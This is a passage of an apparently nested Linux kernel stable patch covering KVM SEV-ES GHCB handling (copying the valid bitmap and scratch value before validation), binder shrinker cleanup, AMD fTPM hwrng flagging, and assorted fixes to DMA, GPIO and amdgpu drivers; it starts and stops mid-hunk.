++	memcpy(&svm->sev_es.valid_bitmap, &ghcb->save.valid_bitmap, sizeof(ghcb->save.valid_bitmap));
+ 
+-	svm->vmcb->save.cpl = ghcb_get_cpl_if_valid(ghcb);
++	vcpu->arch.regs[VCPU_REGS_RAX] = kvm_ghcb_get_rax_if_valid(svm, ghcb);
++	vcpu->arch.regs[VCPU_REGS_RBX] = kvm_ghcb_get_rbx_if_valid(svm, ghcb);
++	vcpu->arch.regs[VCPU_REGS_RCX] = kvm_ghcb_get_rcx_if_valid(svm, ghcb);
++	vcpu->arch.regs[VCPU_REGS_RDX] = kvm_ghcb_get_rdx_if_valid(svm, ghcb);
++	vcpu->arch.regs[VCPU_REGS_RSI] = kvm_ghcb_get_rsi_if_valid(svm, ghcb);
+ 
+-	if (ghcb_xcr0_is_valid(ghcb)) {
++	svm->vmcb->save.cpl = kvm_ghcb_get_cpl_if_valid(svm, ghcb);
++
++	if (kvm_ghcb_xcr0_is_valid(svm)) {
+ 		vcpu->arch.xcr0 = ghcb_get_xcr0(ghcb);
+ 		kvm_update_cpuid_runtime(vcpu);
+ 	}
+@@ -2429,14 +2432,21 @@ static void sev_es_sync_from_ghcb(struct vcpu_svm *svm)
+ 	control->exit_code_hi = upper_32_bits(exit_code);
+ 	control->exit_info_1 = ghcb_get_sw_exit_info_1(ghcb);
+ 	control->exit_info_2 = ghcb_get_sw_exit_info_2(ghcb);
++	svm->sev_es.sw_scratch = kvm_ghcb_get_sw_scratch_if_valid(svm, ghcb);
+ 
+ 	/* Clear the valid entries fields */
+ 	memset(ghcb->save.valid_bitmap, 0, sizeof(ghcb->save.valid_bitmap));
+ }
+ 
++static u64 kvm_ghcb_get_sw_exit_code(struct vmcb_control_area *control)
++{
++	return (((u64)control->exit_code_hi) << 32) | control->exit_code;
++}
++
+ static int sev_es_validate_vmgexit(struct vcpu_svm *svm)
+ {
+-	struct kvm_vcpu *vcpu;
++	struct vmcb_control_area *control = &svm->vmcb->control;
++	struct kvm_vcpu *vcpu = &svm->vcpu;
+ 	struct ghcb *ghcb;
+ 	u64 exit_code;
+ 	u64 reason;
+@@ -2447,7 +2457,7 @@ static int sev_es_validate_vmgexit(struct vcpu_svm *svm)
+ 	 * Retrieve the exit code now even though it may not be marked valid
+ 	 * as it could help with debugging.
+ 	 */
+-	exit_code = ghcb_get_sw_exit_code(ghcb);
++	exit_code = kvm_ghcb_get_sw_exit_code(control);
+ 
+ 	/* Only GHCB Usage code 0 is supported */
+ 	if (ghcb->ghcb_usage) {
+@@ -2457,56 +2467,56 @@ static int sev_es_validate_vmgexit(struct vcpu_svm *svm)
+ 
+ 	reason = GHCB_ERR_MISSING_INPUT;
+ 
+-	if (!ghcb_sw_exit_code_is_valid(ghcb) ||
+-	    !ghcb_sw_exit_info_1_is_valid(ghcb) ||
+-	    !ghcb_sw_exit_info_2_is_valid(ghcb))
++	if (!kvm_ghcb_sw_exit_code_is_valid(svm) ||
++	    !kvm_ghcb_sw_exit_info_1_is_valid(svm) ||
++	    !kvm_ghcb_sw_exit_info_2_is_valid(svm))
+ 		goto vmgexit_err;
+ 
+-	switch (ghcb_get_sw_exit_code(ghcb)) {
++	switch (exit_code) {
+ 	case SVM_EXIT_READ_DR7:
+ 		break;
+ 	case SVM_EXIT_WRITE_DR7:
+-		if (!ghcb_rax_is_valid(ghcb))
++		if (!kvm_ghcb_rax_is_valid(svm))
+ 			goto vmgexit_err;
+ 		break;
+ 	case SVM_EXIT_RDTSC:
+ 		break;
+ 	case SVM_EXIT_RDPMC:
+-		if (!ghcb_rcx_is_valid(ghcb))
++		if (!kvm_ghcb_rcx_is_valid(svm))
+ 			goto vmgexit_err;
+ 		break;
+ 	case SVM_EXIT_CPUID:
+-		if (!ghcb_rax_is_valid(ghcb) ||
+-		    !ghcb_rcx_is_valid(ghcb))
++		if (!kvm_ghcb_rax_is_valid(svm) ||
++		    !kvm_ghcb_rcx_is_valid(svm))
+ 			goto vmgexit_err;
+-		if (ghcb_get_rax(ghcb) == 0xd)
+-			if (!ghcb_xcr0_is_valid(ghcb))
++		if (vcpu->arch.regs[VCPU_REGS_RAX] == 0xd)
++			if (!kvm_ghcb_xcr0_is_valid(svm))
+ 				goto vmgexit_err;
+ 		break;
+ 	case SVM_EXIT_INVD:
+ 		break;
+ 	case SVM_EXIT_IOIO:
+-		if (ghcb_get_sw_exit_info_1(ghcb) & SVM_IOIO_STR_MASK) {
+-			if (!ghcb_sw_scratch_is_valid(ghcb))
++		if (control->exit_info_1 & SVM_IOIO_STR_MASK) {
++			if (!kvm_ghcb_sw_scratch_is_valid(svm))
+ 				goto vmgexit_err;
+ 		} else {
+-			if (!(ghcb_get_sw_exit_info_1(ghcb) & SVM_IOIO_TYPE_MASK))
+-				if (!ghcb_rax_is_valid(ghcb))
++			if (!(control->exit_info_1 & SVM_IOIO_TYPE_MASK))
++				if (!kvm_ghcb_rax_is_valid(svm))
+ 					goto vmgexit_err;
+ 		}
+ 		break;
+ 	case SVM_EXIT_MSR:
+-		if (!ghcb_rcx_is_valid(ghcb))
++		if (!kvm_ghcb_rcx_is_valid(svm))
+ 			goto vmgexit_err;
+-		if (ghcb_get_sw_exit_info_1(ghcb)) {
+-			if (!ghcb_rax_is_valid(ghcb) ||
+-			    !ghcb_rdx_is_valid(ghcb))
++		if (control->exit_info_1) {
++			if (!kvm_ghcb_rax_is_valid(svm) ||
++			    !kvm_ghcb_rdx_is_valid(svm))
+ 				goto vmgexit_err;
+ 		}
+ 		break;
+ 	case SVM_EXIT_VMMCALL:
+-		if (!ghcb_rax_is_valid(ghcb) ||
+-		    !ghcb_cpl_is_valid(ghcb))
++		if (!kvm_ghcb_rax_is_valid(svm) ||
++		    !kvm_ghcb_cpl_is_valid(svm))
+ 			goto vmgexit_err;
+ 		break;
+ 	case SVM_EXIT_RDTSCP:
+@@ -2514,19 +2524,19 @@ static int sev_es_validate_vmgexit(struct vcpu_svm *svm)
+ 	case SVM_EXIT_WBINVD:
+ 		break;
+ 	case SVM_EXIT_MONITOR:
+-		if (!ghcb_rax_is_valid(ghcb) ||
+-		    !ghcb_rcx_is_valid(ghcb) ||
+-		    !ghcb_rdx_is_valid(ghcb))
++		if (!kvm_ghcb_rax_is_valid(svm) ||
++		    !kvm_ghcb_rcx_is_valid(svm) ||
++		    !kvm_ghcb_rdx_is_valid(svm))
+ 			goto vmgexit_err;
+ 		break;
+ 	case SVM_EXIT_MWAIT:
+-		if (!ghcb_rax_is_valid(ghcb) ||
+-		    !ghcb_rcx_is_valid(ghcb))
++		if (!kvm_ghcb_rax_is_valid(svm) ||
++		    !kvm_ghcb_rcx_is_valid(svm))
+ 			goto vmgexit_err;
+ 		break;
+ 	case SVM_VMGEXIT_MMIO_READ:
+ 	case SVM_VMGEXIT_MMIO_WRITE:
+-		if (!ghcb_sw_scratch_is_valid(ghcb))
++		if (!kvm_ghcb_sw_scratch_is_valid(svm))
+ 			goto vmgexit_err;
+ 		break;
+ 	case SVM_VMGEXIT_NMI_COMPLETE:
+@@ -2542,8 +2552,6 @@ static int sev_es_validate_vmgexit(struct vcpu_svm *svm)
+ 	return 0;
+ 
+ vmgexit_err:
+-	vcpu = &svm->vcpu;
+-
+ 	if (reason == GHCB_ERR_INVALID_USAGE) {
+ 		vcpu_unimpl(vcpu, "vmgexit: ghcb usage %#x is not valid\n",
+ 			    ghcb->ghcb_usage);
+@@ -2556,9 +2564,6 @@ vmgexit_err:
+ 		dump_ghcb(svm);
+ 	}
+ 
+-	/* Clear the valid entries fields */
+-	memset(ghcb->save.valid_bitmap, 0, sizeof(ghcb->save.valid_bitmap));
+-
+ 	ghcb_set_sw_exit_info_1(ghcb, 2);
+ 	ghcb_set_sw_exit_info_2(ghcb, reason);
+ 
+@@ -2579,7 +2584,7 @@ void sev_es_unmap_ghcb(struct vcpu_svm *svm)
+ 		 */
+ 		if (svm->sev_es.ghcb_sa_sync) {
+ 			kvm_write_guest(svm->vcpu.kvm,
+-					ghcb_get_sw_scratch(svm->sev_es.ghcb),
++					svm->sev_es.sw_scratch,
+ 					svm->sev_es.ghcb_sa,
+ 					svm->sev_es.ghcb_sa_len);
+ 			svm->sev_es.ghcb_sa_sync = false;
+@@ -2630,7 +2635,7 @@ static int setup_vmgexit_scratch(struct vcpu_svm *svm, bool sync, u64 len)
+ 	u64 scratch_gpa_beg, scratch_gpa_end;
+ 	void *scratch_va;
+ 
+-	scratch_gpa_beg = ghcb_get_sw_scratch(ghcb);
++	scratch_gpa_beg = svm->sev_es.sw_scratch;
+ 	if (!scratch_gpa_beg) {
+ 		pr_err("vmgexit: scratch gpa not provided\n");
+ 		goto e_scratch;
+@@ -2844,16 +2849,15 @@ int sev_handle_vmgexit(struct kvm_vcpu *vcpu)
+ 
+ 	trace_kvm_vmgexit_enter(vcpu->vcpu_id, ghcb);
+ 
+-	exit_code = ghcb_get_sw_exit_code(ghcb);
+-
++	sev_es_sync_from_ghcb(svm);
+ 	ret = sev_es_validate_vmgexit(svm);
+ 	if (ret)
+ 		return ret;
+ 
+-	sev_es_sync_from_ghcb(svm);
+ 	ghcb_set_sw_exit_info_1(ghcb, 0);
+ 	ghcb_set_sw_exit_info_2(ghcb, 0);
+ 
++	exit_code = kvm_ghcb_get_sw_exit_code(control);
+ 	switch (exit_code) {
+ 	case SVM_VMGEXIT_MMIO_READ:
+ 		ret = setup_vmgexit_scratch(svm, true, control->exit_info_2);
+diff --git a/arch/x86/kvm/svm/svm.h b/arch/x86/kvm/svm/svm.h
+index d0ed3f5952295..62f87492763e0 100644
+--- a/arch/x86/kvm/svm/svm.h
++++ b/arch/x86/kvm/svm/svm.h
+@@ -196,10 +196,12 @@ struct vcpu_sev_es_state {
+ 	/* SEV-ES support */
+ 	struct sev_es_save_area *vmsa;
+ 	struct ghcb *ghcb;
++	u8 valid_bitmap[16];
+ 	struct kvm_host_map ghcb_map;
+ 	bool received_first_sipi;
+ 
+ 	/* SEV-ES scratch area support */
++	u64 sw_scratch;
+ 	void *ghcb_sa;
+ 	u32 ghcb_sa_len;
+ 	bool ghcb_sa_sync;
+@@ -688,4 +690,28 @@ void sev_es_unmap_ghcb(struct vcpu_svm *svm);
+ void __svm_sev_es_vcpu_run(struct vcpu_svm *svm, bool spec_ctrl_intercepted);
+ void __svm_vcpu_run(struct vcpu_svm *svm, bool spec_ctrl_intercepted);
+ 
++#define DEFINE_KVM_GHCB_ACCESSORS(field)						\
++	static __always_inline bool kvm_ghcb_##field##_is_valid(const struct vcpu_svm *svm) \
++	{									\
++		return test_bit(GHCB_BITMAP_IDX(field),				\
++				(unsigned long *)&svm->sev_es.valid_bitmap);	\
++	}									\
++										\
++	static __always_inline u64 kvm_ghcb_get_##field##_if_valid(struct vcpu_svm *svm, struct ghcb *ghcb) \
++	{									\
++		return kvm_ghcb_##field##_is_valid(svm) ? ghcb->save.field : 0;	\
++	}									\
++
++DEFINE_KVM_GHCB_ACCESSORS(cpl)
++DEFINE_KVM_GHCB_ACCESSORS(rax)
++DEFINE_KVM_GHCB_ACCESSORS(rcx)
++DEFINE_KVM_GHCB_ACCESSORS(rdx)
++DEFINE_KVM_GHCB_ACCESSORS(rbx)
++DEFINE_KVM_GHCB_ACCESSORS(rsi)
++DEFINE_KVM_GHCB_ACCESSORS(sw_exit_code)
++DEFINE_KVM_GHCB_ACCESSORS(sw_exit_info_1)
++DEFINE_KVM_GHCB_ACCESSORS(sw_exit_info_2)
++DEFINE_KVM_GHCB_ACCESSORS(sw_scratch)
++DEFINE_KVM_GHCB_ACCESSORS(xcr0)
++
+ #endif
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index f4b12c3c30a01..1931d3fcbbe09 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -311,8 +311,6 @@ u64 __read_mostly host_xcr0;
+ 
+ static struct kmem_cache *x86_emulator_cache;
+ 
+-extern bool gds_ucode_mitigated(void);
+-
+ /*
+  * When called, it means the previous get/set msr reached an invalid msr.
+  * Return true if we want to ignore/silent this failed msr access.
+diff --git a/drivers/acpi/scan.c b/drivers/acpi/scan.c
+index dbfa58e799e28..a0e347f6f97eb 100644
+--- a/drivers/acpi/scan.c
++++ b/drivers/acpi/scan.c
+@@ -1712,6 +1712,7 @@ static bool acpi_device_enumeration_by_parent(struct acpi_device *device)
+ 		{"BSG1160", },
+ 		{"BSG2150", },
+ 		{"CSC3551", },
++		{"CSC3556", },
+ 		{"INT33FE", },
+ 		{"INT3515", },
+ 		/* Non-conforming _HID for Cirrus Logic already released */
+diff --git a/drivers/android/binder.c b/drivers/android/binder.c
+index e374a8a2da46e..e4a6da81cd4b3 100644
+--- a/drivers/android/binder.c
++++ b/drivers/android/binder.c
+@@ -6602,6 +6602,7 @@ err_init_binder_device_failed:
+ 
+ err_alloc_device_names_failed:
+ 	debugfs_remove_recursive(binder_debugfs_dir_entry_root);
++	binder_alloc_shrinker_exit();
+ 
+ 	return ret;
+ }
+diff --git a/drivers/android/binder_alloc.c b/drivers/android/binder_alloc.c
+index 4fb89ef067d57..cd87f12733f27 100644
+--- a/drivers/android/binder_alloc.c
++++ b/drivers/android/binder_alloc.c
+@@ -1087,6 +1087,12 @@ int binder_alloc_shrinker_init(void)
+ 	return ret;
+ }
+ 
++void binder_alloc_shrinker_exit(void)
++{
++	unregister_shrinker(&binder_shrinker);
++	list_lru_destroy(&binder_alloc_lru);
++}
++
+ /**
+  * check_buffer() - verify that buffer/offset is safe to access
+  * @alloc: binder_alloc for this proc
+diff --git a/drivers/android/binder_alloc.h b/drivers/android/binder_alloc.h
+index 138d1d5af9ce3..dc1e2b01dd64d 100644
+--- a/drivers/android/binder_alloc.h
++++ b/drivers/android/binder_alloc.h
+@@ -129,6 +129,7 @@ extern struct binder_buffer *binder_alloc_new_buf(struct binder_alloc *alloc,
+ 						  int pid);
+ extern void binder_alloc_init(struct binder_alloc *alloc);
+ extern int binder_alloc_shrinker_init(void);
++extern void binder_alloc_shrinker_exit(void);
+ extern void binder_alloc_vma_close(struct binder_alloc *alloc);
+ extern struct binder_buffer *
+ binder_alloc_prepare_to_free(struct binder_alloc *alloc,
+diff --git a/drivers/char/tpm/tpm-chip.c b/drivers/char/tpm/tpm-chip.c
+index d7ef4d0a7409f..c0759d49fd145 100644
+--- a/drivers/char/tpm/tpm-chip.c
++++ b/drivers/char/tpm/tpm-chip.c
+@@ -507,70 +507,6 @@ static int tpm_add_legacy_sysfs(struct tpm_chip *chip)
+ 	return 0;
+ }
+ 
+-/*
+- * Some AMD fTPM versions may cause stutter
+- * https://www.amd.com/en/support/kb/faq/pa-410
+- *
+- * Fixes are available in two series of fTPM firmware:
+- * 6.x.y.z series: 6.0.18.6 +
+- * 3.x.y.z series: 3.57.y.5 +
+- */
+-#ifdef CONFIG_X86
+-static bool tpm_amd_is_rng_defective(struct tpm_chip *chip)
+-{
+-	u32 val1, val2;
+-	u64 version;
+-	int ret;
+-
+-	if (!(chip->flags & TPM_CHIP_FLAG_TPM2))
+-		return false;
+-
+-	ret = tpm_request_locality(chip);
+-	if (ret)
+-		return false;
+-
+-	ret = tpm2_get_tpm_pt(chip, TPM2_PT_MANUFACTURER, &val1, NULL);
+-	if (ret)
+-		goto release;
+-	if (val1 != 0x414D4400U /* AMD */) {
+-		ret = -ENODEV;
+-		goto release;
+-	}
+-	ret = tpm2_get_tpm_pt(chip, TPM2_PT_FIRMWARE_VERSION_1, &val1, NULL);
+-	if (ret)
+-		goto release;
+-	ret = tpm2_get_tpm_pt(chip, TPM2_PT_FIRMWARE_VERSION_2, &val2, NULL);
+-
+-release:
+-	tpm_relinquish_locality(chip);
+-
+-	if (ret)
+-		return false;
+-
+-	version = ((u64)val1 << 32) | val2;
+-	if ((version >> 48) == 6) {
+-		if (version >= 0x0006000000180006ULL)
+-			return false;
+-	} else if ((version >> 48) == 3) {
+-		if (version >= 0x0003005700000005ULL)
+-			return false;
+-	} else {
+-		return false;
+-	}
+-
+-	dev_warn(&chip->dev,
+-		 "AMD fTPM version 0x%llx causes system stutter; hwrng disabled\n",
+-		 version);
+-
+-	return true;
+-}
+-#else
+-static inline bool tpm_amd_is_rng_defective(struct tpm_chip *chip)
+-{
+-	return false;
+-}
+-#endif /* CONFIG_X86 */
+-
+ static int tpm_hwrng_read(struct hwrng *rng, void *data, size_t max, bool wait)
+ {
+ 	struct tpm_chip *chip = container_of(rng, struct tpm_chip, hwrng);
+@@ -582,10 +518,20 @@ static int tpm_hwrng_read(struct hwrng *rng, void *data, size_t max, bool wait)
+ 	return tpm_get_random(chip, data, max);
+ }
+ 
++static bool tpm_is_hwrng_enabled(struct tpm_chip *chip)
++{
++	if (!IS_ENABLED(CONFIG_HW_RANDOM_TPM))
++		return false;
++	if (tpm_is_firmware_upgrade(chip))
++		return false;
++	if (chip->flags & TPM_CHIP_FLAG_HWRNG_DISABLED)
++		return false;
++	return true;
++}
++
+ static int tpm_add_hwrng(struct tpm_chip *chip)
+ {
+-	if (!IS_ENABLED(CONFIG_HW_RANDOM_TPM) || tpm_is_firmware_upgrade(chip) ||
+-	    tpm_amd_is_rng_defective(chip))
++	if (!tpm_is_hwrng_enabled(chip))
+ 		return 0;
+ 
+ 	snprintf(chip->hwrng_name, sizeof(chip->hwrng_name),
+@@ -690,7 +636,7 @@ int tpm_chip_register(struct tpm_chip *chip)
+ 	return 0;
+ 
+ out_hwrng:
+-	if (IS_ENABLED(CONFIG_HW_RANDOM_TPM) && !tpm_is_firmware_upgrade(chip))
++	if (tpm_is_hwrng_enabled(chip))
+ 		hwrng_unregister(&chip->hwrng);
+ out_ppi:
+ 	tpm_bios_log_teardown(chip);
+@@ -715,8 +661,7 @@ EXPORT_SYMBOL_GPL(tpm_chip_register);
+ void tpm_chip_unregister(struct tpm_chip *chip)
+ {
+ 	tpm_del_legacy_sysfs(chip);
+-	if (IS_ENABLED(CONFIG_HW_RANDOM_TPM) && !tpm_is_firmware_upgrade(chip) &&
+-	    !tpm_amd_is_rng_defective(chip))
++	if (tpm_is_hwrng_enabled(chip))
+ 		hwrng_unregister(&chip->hwrng);
+ 	tpm_bios_log_teardown(chip);
+ 	if (chip->flags & TPM_CHIP_FLAG_TPM2 && !tpm_is_firmware_upgrade(chip))
+diff --git a/drivers/char/tpm/tpm_crb.c b/drivers/char/tpm/tpm_crb.c
+index cbbedf52607c0..7f7f3bded4535 100644
+--- a/drivers/char/tpm/tpm_crb.c
++++ b/drivers/char/tpm/tpm_crb.c
+@@ -463,6 +463,28 @@ static bool crb_req_canceled(struct tpm_chip *chip, u8 status)
+ 	return (cancel & CRB_CANCEL_INVOKE) == CRB_CANCEL_INVOKE;
+ }
+ 
++static int crb_check_flags(struct tpm_chip *chip)
++{
++	u32 val;
++	int ret;
++
++	ret = crb_request_locality(chip, 0);
++	if (ret)
++		return ret;
++
++	ret = tpm2_get_tpm_pt(chip, TPM2_PT_MANUFACTURER, &val, NULL);
++	if (ret)
++		goto release;
++
++	if (val == 0x414D4400U /* AMD */)
++		chip->flags |= TPM_CHIP_FLAG_HWRNG_DISABLED;
++
++release:
++	crb_relinquish_locality(chip, 0);
++
++	return ret;
++}
++
+ static const struct tpm_class_ops tpm_crb = {
+ 	.flags = TPM_OPS_AUTO_STARTUP,
+ 	.status = crb_status,
+@@ -800,6 +822,14 @@ static int crb_acpi_add(struct acpi_device *device)
+ 	chip->acpi_dev_handle = device->handle;
+ 	chip->flags = TPM_CHIP_FLAG_TPM2;
+ 
++	rc = tpm_chip_bootstrap(chip);
++	if (rc)
++		goto out;
++
++	rc = crb_check_flags(chip);
++	if (rc)
++		goto out;
++
+ 	rc = tpm_chip_register(chip);
+ 
+ out:
+diff --git a/drivers/cpuidle/dt_idle_genpd.c b/drivers/cpuidle/dt_idle_genpd.c
+index b37165514d4e7..1af63c189039e 100644
+--- a/drivers/cpuidle/dt_idle_genpd.c
++++ b/drivers/cpuidle/dt_idle_genpd.c
+@@ -152,6 +152,30 @@ int dt_idle_pd_init_topology(struct device_node *np)
+ 	return 0;
+ }
+ 
++int dt_idle_pd_remove_topology(struct device_node *np)
++{
++	struct device_node *node;
++	struct of_phandle_args child, parent;
++	int ret;
++
++	for_each_child_of_node(np, node) {
++		if (of_parse_phandle_with_args(node, "power-domains",
++					"#power-domain-cells", 0, &parent))
++			continue;
++
++		child.np = node;
++		child.args_count = 0;
++		ret = of_genpd_remove_subdomain(&parent, &child);
++		of_node_put(parent.np);
++		if (ret) {
++			of_node_put(node);
++			return ret;
++		}
++	}
++
++	return 0;
++}
++
+ struct device *dt_idle_attach_cpu(int cpu, const char *name)
+ {
+ 	struct device *dev;
+diff --git a/drivers/cpuidle/dt_idle_genpd.h b/drivers/cpuidle/dt_idle_genpd.h
+index a95483d08a02a..3be1f70f55b5c 100644
+--- a/drivers/cpuidle/dt_idle_genpd.h
++++ b/drivers/cpuidle/dt_idle_genpd.h
+@@ -14,6 +14,8 @@ struct generic_pm_domain *dt_idle_pd_alloc(struct device_node *np,
+ 
+ int dt_idle_pd_init_topology(struct device_node *np);
+ 
++int dt_idle_pd_remove_topology(struct device_node *np);
++
+ struct device *dt_idle_attach_cpu(int cpu, const char *name);
+ 
+ void dt_idle_detach_cpu(struct device *dev);
+@@ -36,6 +38,11 @@ static inline int dt_idle_pd_init_topology(struct device_node *np)
+ 	return 0;
+ }
+ 
++static inline int dt_idle_pd_remove_topology(struct device_node *np)
++{
++	return 0;
++}
++
+ static inline struct device *dt_idle_attach_cpu(int cpu, const char *name)
+ {
+ 	return NULL;
+diff --git a/drivers/dma/mcf-edma.c b/drivers/dma/mcf-edma.c
+index e12b754e6398d..60d3c5f09ad67 100644
+--- a/drivers/dma/mcf-edma.c
++++ b/drivers/dma/mcf-edma.c
+@@ -191,7 +191,13 @@ static int mcf_edma_probe(struct platform_device *pdev)
+ 		return -EINVAL;
+ 	}
+ 
+-	chans = pdata->dma_channels;
++	if (!pdata->dma_channels) {
++		dev_info(&pdev->dev, "setting default channel number to 64");
++		chans = 64;
++	} else {
++		chans = pdata->dma_channels;
++	}
++
+ 	len = sizeof(*mcf_edma) + sizeof(*mcf_chan) * chans;
+ 	mcf_edma = devm_kzalloc(&pdev->dev, len, GFP_KERNEL);
+ 	if (!mcf_edma)
+@@ -203,11 +209,6 @@ static int mcf_edma_probe(struct platform_device *pdev)
+ 	mcf_edma->drvdata = &mcf_data;
+ 	mcf_edma->big_endian = 1;
+ 
+-	if (!mcf_edma->n_chans) {
+-		dev_info(&pdev->dev, "setting default channel number to 64");
+-		mcf_edma->n_chans = 64;
+-	}
+-
+ 	mutex_init(&mcf_edma->fsl_edma_mutex);
+ 
+ 	res = platform_get_resource(pdev, IORESOURCE_MEM, 0);
+diff --git a/drivers/dma/owl-dma.c b/drivers/dma/owl-dma.c
+index 95a462a1f5111..b6e0ac8314e5c 100644
+--- a/drivers/dma/owl-dma.c
++++ b/drivers/dma/owl-dma.c
+@@ -192,7 +192,7 @@ struct owl_dma_pchan {
+ };
+ 
+ /**
+- * struct owl_dma_pchan - Wrapper for DMA ENGINE channel
++ * struct owl_dma_vchan - Wrapper for DMA ENGINE channel
+  * @vc: wrapped virtual channel
+  * @pchan: the physical channel utilized by this channel
+  * @txd: active transaction on this channel
+diff --git a/drivers/dma/pl330.c b/drivers/dma/pl330.c
+index b4731fe6bbc14..3cf0b38387ae5 100644
+--- a/drivers/dma/pl330.c
++++ b/drivers/dma/pl330.c
+@@ -403,6 +403,12 @@ enum desc_status {
+ 	 * of a channel can be BUSY at any time.
+ 	 */
+ 	BUSY,
++	/*
++	 * Pause was called while descriptor was BUSY. Due to hardware
++	 * limitations, only termination is possible for descriptors
++	 * that have been paused.
++	 */
++	PAUSED,
+ 	/*
+ 	 * Sitting on the channel work_list but xfer done
+ 	 * by PL330 core
+@@ -2041,7 +2047,7 @@ static inline void fill_queue(struct dma_pl330_chan *pch)
+ 	list_for_each_entry(desc, &pch->work_list, node) {
+ 
+ 		/* If already submitted */
+-		if (desc->status == BUSY)
++		if (desc->status == BUSY || desc->status == PAUSED)
+ 			continue;
+ 
+ 		ret = pl330_submit_req(pch->thread, desc);
+@@ -2326,6 +2332,7 @@ static int pl330_pause(struct dma_chan *chan)
+ {
+ 	struct dma_pl330_chan *pch = to_pchan(chan);
+ 	struct pl330_dmac *pl330 = pch->dmac;
++	struct dma_pl330_desc *desc;
+ 	unsigned long flags;
+ 
+ 	pm_runtime_get_sync(pl330->ddma.dev);
+@@ -2335,6 +2342,10 @@ static int pl330_pause(struct dma_chan *chan)
+ 	_stop(pch->thread);
+ 	spin_unlock(&pl330->lock);
+ 
++	list_for_each_entry(desc, &pch->work_list, node) {
++		if (desc->status == BUSY)
++			desc->status = PAUSED;
++	}
+ 	spin_unlock_irqrestore(&pch->lock, flags);
+ 	pm_runtime_mark_last_busy(pl330->ddma.dev);
+ 	pm_runtime_put_autosuspend(pl330->ddma.dev);
+@@ -2425,7 +2436,7 @@ pl330_tx_status(struct dma_chan *chan, dma_cookie_t cookie,
+ 		else if (running && desc == running)
+ 			transferred =
+ 				pl330_get_current_xferred_count(pch, desc);
+-		else if (desc->status == BUSY)
++		else if (desc->status == BUSY || desc->status == PAUSED)
+ 			/*
+ 			 * Busy but not running means either just enqueued,
+ 			 * or finished and not yet marked done
+@@ -2442,6 +2453,9 @@ pl330_tx_status(struct dma_chan *chan, dma_cookie_t cookie,
+ 			case DONE:
+ 				ret = DMA_COMPLETE;
+ 				break;
++			case PAUSED:
++				ret = DMA_PAUSED;
++				break;
+ 			case PREP:
+ 			case BUSY:
+ 				ret = DMA_IN_PROGRESS;
+diff --git a/drivers/gpio/gpio-sim.c b/drivers/gpio/gpio-sim.c
+index 803676e307d73..fef12e57b1f13 100644
+--- a/drivers/gpio/gpio-sim.c
++++ b/drivers/gpio/gpio-sim.c
+@@ -425,6 +425,7 @@ static int gpio_sim_add_bank(struct fwnode_handle *swnode, struct device *dev)
+ 	gc->set_config = gpio_sim_set_config;
+ 	gc->to_irq = gpio_sim_to_irq;
+ 	gc->free = gpio_sim_free;
++	gc->can_sleep = true;
+ 
+ 	ret = devm_gpiochip_add_data(dev, gc, chip);
+ 	if (ret)
+diff --git a/drivers/gpio/gpio-ws16c48.c b/drivers/gpio/gpio-ws16c48.c
+index e73885a4dc328..afb42a8e916fe 100644
+--- a/drivers/gpio/gpio-ws16c48.c
++++ b/drivers/gpio/gpio-ws16c48.c
+@@ -18,7 +18,7 @@
+ #include <linux/spinlock.h>
+ #include <linux/types.h>
+ 
+-#define WS16C48_EXTENT 10
++#define WS16C48_EXTENT 11
+ #define MAX_NUM_WS16C48 max_num_isa_dev(WS16C48_EXTENT)
+ 
+ static unsigned int base[MAX_NUM_WS16C48];
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu.h b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+index c0e782a95e72e..0c962f996aff5 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+@@ -242,6 +242,7 @@ extern int amdgpu_num_kcq;
+ 
+ #define AMDGPU_VCNFW_LOG_SIZE (32 * 1024)
+ extern int amdgpu_vcnfw_log;
++extern int amdgpu_sg_display;
+ 
+ #define AMDGPU_VM_MAX_NUM_CTX			4096
+ #define AMDGPU_SG_THRESHOLD			(256*1024*1024)
+@@ -283,6 +284,9 @@ extern int amdgpu_vcnfw_log;
+ #define AMDGPU_SMARTSHIFT_MAX_BIAS (100)
+ #define AMDGPU_SMARTSHIFT_MIN_BIAS (-100)
+ 
++/* Extra time delay(in ms) to eliminate the influence of temperature momentary fluctuation */
++#define AMDGPU_SWCTF_EXTRA_DELAY		50
++
+ struct amdgpu_device;
+ struct amdgpu_irq_src;
+ struct amdgpu_fpriv;
+@@ -1262,6 +1266,7 @@ int amdgpu_device_gpu_recover(struct amdgpu_device *adev,
+ void amdgpu_device_pci_config_reset(struct amdgpu_device *adev);
+ int amdgpu_device_pci_reset(struct amdgpu_device *adev);
+ bool amdgpu_device_need_post(struct amdgpu_device *adev);
++bool amdgpu_sg_display_supported(struct amdgpu_device *adev);
+ bool amdgpu_device_pcie_dynamic_switching_supported(void);
+ bool amdgpu_device_should_use_aspm(struct amdgpu_device *adev);
+ bool amdgpu_device_aspm_support_quirk(void);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
+index b60b6e6149bf7..fdb53d4394f30 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
+@@ -287,7 +287,7 @@ static int amdgpu_cs_pass1(struct amdgpu_cs_parser *p,
+ 
+ 	if (!p->gang_size) {
+ 		ret = -EINVAL;
+-		goto free_partial_kdata;
++		goto free_all_kdata;
+ 	}
+ 
+ 	for (i = 0; i < p->gang_size; ++i) {
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 30c97ee375636..773383e660e8c 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -1333,6 +1333,32 @@ bool amdgpu_device_need_post(struct amdgpu_device *adev)
+ 	return true;
+ }
+ 
++/*
++ * On APUs with >= 64GB white flickering has been observed w/ SG enabled.
++ * Disable S/G on such systems until we have a proper fix.
++ * https://gitlab.freedesktop.org/drm/amd/-/issues/2354
++ * https://gitlab.freedesktop.org/drm/amd/-/issues/2735
++ */
++bool amdgpu_sg_display_supported(struct amdgpu_device *adev)
++{
